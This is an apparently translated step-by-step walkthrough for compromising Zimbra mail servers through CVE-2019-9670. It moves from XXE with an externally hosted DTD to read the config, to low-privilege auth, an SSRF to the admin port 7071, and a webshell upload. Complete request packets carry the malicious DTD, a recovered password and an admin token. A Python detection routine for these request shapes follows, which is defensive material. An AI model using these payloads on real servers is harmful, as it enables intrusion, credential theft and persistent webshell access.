Step one: use XXE to read the configuration file
Here CVE-2019-9670 is used to read the configuration file. You need to host a DTD file on your own VPS so that it can be fetched over HTTP. For the demonstration, I created a repository on GitHub and fetched the DTD file from there.
The Zimbra account password circled in red in the figure above will be needed later; note it down for now.
The DTD file reads as follows:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
The POST request packet is as follows:
POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0;) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 436
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1

<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Step two: obtain a low-privilege token
As the figure shows, a token has been obtained, but it is not an administrator token; note it down for the next step.
The POST request packet is as follows:
POST /service/soap HTTP/1.1
Host: mail.****.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 467
Connection: close
Cookie: ZM_TEST=true
Upgrade-Insecure-Requests: 1

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient" version="5.0.15_GA_2851"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAccount">
<account by="adminName">zimbra</account>
<password>GzXaU76_s5</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
Step three: use SSRF to obtain an admin-privilege token
Add the low-privilege token obtained in the previous step to the cookie, change xmlns="urn:zimbraAccount" to xmlns="urn:zimbraAdmin", append ":7071" to the Host header, and use the https protocol for the target in the URL. Sending this request returns an admin-privilege token.
The POST request packet is as follows:
POST /service/proxy?target=https://127.0.0.1:7071/service/admin/soap HTTP/1.1
Host: mail.****.com:7071
User-Agent: Mozilla/5.0 (Windows NT 10.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://mail.****.com/zimbra/
Content-Type: application/soap+xml
Content-Length: 465
Connection: close
Cookie: ZM_ADMIN_AUTH_TOKEN=0_5221766f264e4dcb78b4f67be5f839b1ed668da3_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343733303133353638333b747970653d363a7a696d6272613b7469643d393a3735353034333637323b
Upgrade-Insecure-Requests: 1

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<account by="adminName">zimbra</account>
<password>GzXaU76_s5</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
Step four: upload the webshell
Add the admin-privilege token obtained in the previous step to the cookie, then upload the webshell.
The webshell path is /downloads/k4x6p.jsp; the admin token must be present in the cookie when accessing the webshell.
You can use it to write a small webshell elsewhere that Chopper can connect to; in other directories it can be accessed without the cookie.
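A defender's detection pass over the three request shapes in the chain above, as an added example that is not part of the original post: it flags an external-entity DOCTYPE sent to the Autodiscover endpoint, a /service/proxy target aimed at the loopback admin port 7071, and an admin auth token presented to a JSP under /downloads/. It assumes request records (path with query, headers, body) as a reverse proxy or WAF would log them; the sample records are constructed to match the packets in the post.

```python
import re
from urllib.parse import urlparse, parse_qs

# Endpoints and payload shapes are the ones in the chain above; request records are constructed.
XXE_PATH = "/Autodiscover/Autodiscover.xml"
PROXY_PATH = "/service/proxy"
ADMIN_PORT = 7071
# An entity declaration whose SYSTEM identifier loads a remote or local resource
EXTERNAL_ENTITY = re.compile(r"<!ENTITY\s+%?\s*\w+\s+SYSTEM\s+[\"'](?:https?|ftp|file):", re.I)
LOOPBACK = re.compile(r"^(?:127\.0\.0\.1|localhost|::1)$", re.I)

def classify_request(req):
    """Return detection labels for one request dict (keys: method, path incl. query, headers, body)."""
    hits = []
    url = urlparse(req["path"])
    body = req.get("body", "")
    cookie = {k.lower(): v for k, v in req.get("headers", {}).items()}.get("cookie", "")
    # Step 1: Autodiscover SOAP body with a DOCTYPE that pulls in an external DTD
    if url.path == XXE_PATH and "<!DOCTYPE" in body and EXTERNAL_ENTITY.search(body):
        hits.append("xxe-external-entity")
    # Step 3: /service/proxy whose target points back at the loopback admin port
    if url.path == PROXY_PATH:
        for target in parse_qs(url.query).get("target", []):
            t = urlparse(target)
            try:
                suspicious = bool(LOOPBACK.match(t.hostname or "")) and t.port == ADMIN_PORT
            except ValueError:  # malformed port on a loopback target: flag rather than skip
                suspicious = True
            if suspicious:
                hits.append("ssrf-loopback-admin-port")
    # Step 4: an admin auth token presented to a JSP under /downloads/, which no admin-console request does
    if "ZM_ADMIN_AUTH_TOKEN=" in cookie and url.path.startswith("/downloads/") and url.path.endswith(".jsp"):
        hits.append("admin-token-on-downloads-jsp")
    return hits

def scan(requests):
    """Map each flagged request's path to its labels; clean requests are omitted."""
    return {r["path"]: labels for r in requests if (labels := classify_request(r))}

SAMPLE_REQUESTS = [  # constructed samples shaped like the packets in the post
    {"method": "POST", "path": XXE_PATH, "headers": {"Cookie": "ZM_TEST=true"},
     "body": '<!DOCTYPE Autodiscover [ <!ENTITY % dtd SYSTEM "http://192.168.3.5/dtd"> %dtd; %all; ]>'
             '<Autodiscover><Request><EMailAddress>aaaaa</EMailAddress></Request></Autodiscover>'},
    {"method": "POST", "path": "/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",
     "headers": {"Cookie": "ZM_ADMIN_AUTH_TOKEN=<placeholder>"}, "body": "<soap:Envelope/>"},
    {"method": "GET", "path": "/downloads/k4x6p.jsp",
     "headers": {"Cookie": "ZM_ADMIN_AUTH_TOKEN=<placeholder>"}, "body": ""},
    {"method": "POST", "path": "/service/soap", "headers": {"Cookie": "ZM_TEST=true"},
     "body": "<soap:Envelope><soap:Body/></soap:Envelope>"},  # ordinary login, not flagged
]
```

Calling scan(SAMPLE_REQUESTS) returns the three flagged paths with their labels; the ordinary /service/soap login is not reported.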
I mainly did the tidying-up here; thanks to the experts online who wrote the analysis articles.
Reference links:
https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html
https://blog.csdn.net/fnmsd/article/details/88657083
http://www.cnvd.org.cn/flaw/show/CNVD-2019-07448
http://www.cnvd.org.cn/flaw/download?cd=20f07bbf4fc4769b606a52a0d14f79dd